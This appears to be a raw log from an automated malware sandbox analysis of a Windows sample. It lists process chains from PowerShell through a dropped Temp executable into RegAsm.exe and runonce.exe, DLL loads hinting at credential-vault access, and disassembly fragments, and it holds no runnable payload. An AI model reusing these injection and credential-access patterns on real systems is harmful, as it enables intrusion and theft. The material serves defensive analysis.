Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
Source: C:\Windows\SysWOW64\runonce.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_071F5428 push esp; retf	0_2_071F5431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041F04F push ebx; ret	6_2_0041F058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00403280 push eax; ret	6_2_00403282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041AB61 pushfd ; ret	6_2_0041AB78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041ABD6 push ds; ret	6_2_0041ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040D38A push edx; iretd	6_2_0040D453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00426CC3 pushad ; iretd	6_2_00426CEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004084DA push esi; retf	6_2_004084DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004084FF push ebp; iretd	6_2_00408502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00412559 push ecx; iretd	6_2_0041255A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004125DC pushfd ; iretd	6_2_004125FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00413E59 push 2C1D344Fh; ret	6_2_00413E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00405E25 push ecx; ret	6_2_00405E2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00401F0E push ss; retf	6_2_00401F14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0316225F pushad ; ret	6_2_031627F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031627FA pushad ; ret	6_2_031627F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031909AD push ecx; mov dword ptr [esp], ecx	6_2_031909B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0316283D push eax; iretd	6_2_03162858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03161368 push eax; iretd	6_2_03161369
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FB63BA push ds; ret	14_2_02FB63BC
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FA8B6E push edx; iretd	14_2_02FA8C37
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FB6345 pushfd ; ret	14_2_02FB635C
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FAF63D push 2C1D344Fh; ret	14_2_02FAF644
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FA1609 push ecx; ret	14_2_02FA160F
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FA3CE3 push ebp; iretd	14_2_02FA3CE6
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FB1CCB push eax; ret	14_2_02FB1CD7
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FA3CBE push esi; retf	14_2_02FA3CC1
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FADDC0 pushfd ; iretd	14_2_02FADDDF
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	Code function: 14_2_02FADD3D push ecx; iretd	14_2_02FADD3E
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052327FA pushad ; ret	15_2_052327F9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_0523225F pushad ; ret	15_2_052327F9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
